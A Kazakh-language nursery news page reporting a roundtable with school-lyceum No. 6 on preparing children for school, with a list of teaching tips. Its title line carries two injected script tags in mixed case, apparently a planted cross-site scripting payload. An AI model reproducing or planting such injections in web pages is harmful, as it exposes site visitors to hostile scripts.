№6 мектеп – лицеймен сабақтасқан Дөңгелек үстел: «Баланы мектепке дайындау»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.01.2022

№6 мектеп – лицеймен сабақтасқан Дөңгелек үстел:

«Баланы мектепке дайындау»

Отырыс:  «Қуаныш» бөбекжайы

Қатысқандар: мектепалды даярлық топтарының тәрбиешілері

  1. аңтар 2022ж., сағат 13.30.

 

Қазақстан Республикасының Президенті Қасым – Жомарт Тоқаев 2022 жылды «Балалар жылы» деп атады. Осы орайда «Қуаныш» бөбекжайы заманауй талаптарға сай балалар тәрбиелеу мақсатында, оқу және тәрбие жұмысының сапасын арттыру үшін жан - жақты жұмыс жүргізуді бастап кетті. Бөбекжайға келіп жүрген тәрбиеленушілердің ата-аналарымен тығыз байласта болып  қазіргі өмірі мен ұядан ұшқаннан кейінгі өміріндегі мағлұматтарды алып отырады. Балалардың барған оқу орындарымен үнемі байланыста болып оқыту, тәрбиелеу жұмысына тағы да үлес қосу жоспарлануда. Бүгін «Қуаныш» бөбекжайы Көкшетау қаласының №6 мектеп –лицейімен сабақтасқан Дөңгелек үстел жүргізілді.  Дөңгелек үстелге бөбекжайдың меңгерушісі Байкенова Сағила Баймурзақызы, әдіскері Құлмағанбетова Ғ.Е. және мектепалды даярлық топтарының тәрбиешілері Зкрина Ү.Е., Омирсерикова З.М., Шарипова К.К., Кабдушева Ж.Б., Калауова Г.С., Қайыркеш Н.Қ., №6 мектеп – лицейінің бастауыш сынып мұғалімі  Жанабаева Нурия Кожановна қатысты. Отырыс кезінде тәрбиешілер баланы мектепке дайындау   барысында нақты қандай бағыттарға көңіл бөлу қажет екендігі айтылды.

  • қаламмен графикалық жазу,
  • суретті штрихтау әдісі арқылы бояу,
  • оқу құралдарын жинақы ұстау,
  • геометриялық пішіндерді жиынға бөлу,
  • математикалық есептеу кезінде таяқшалар қолдану,
  • қазақ тілді дыбыстардың дұрыс айтылуы,
  • есте сақтау қабілеттерін арттыру үшін жаңылтпаш, мақал-мәтелдерді көбірек жаттатқызу
  •  сияқты кеңестер берілді. Сонымен қатар алдағы уақытта балалардың білім деңгейін арттыру мақсатында «Қуаныш» бөбекжайының тәрбиешілері мен №6 мектеп – лицейінің бастауыш сынып мұғалімдерінің сабақтарға қатысып тәжірибе алмасуына жоспар құрылатын болып шешім қабылданды.  

 

 

Просмотров: 456


Пікір қосу



Деректерді қолтаңбаға қосу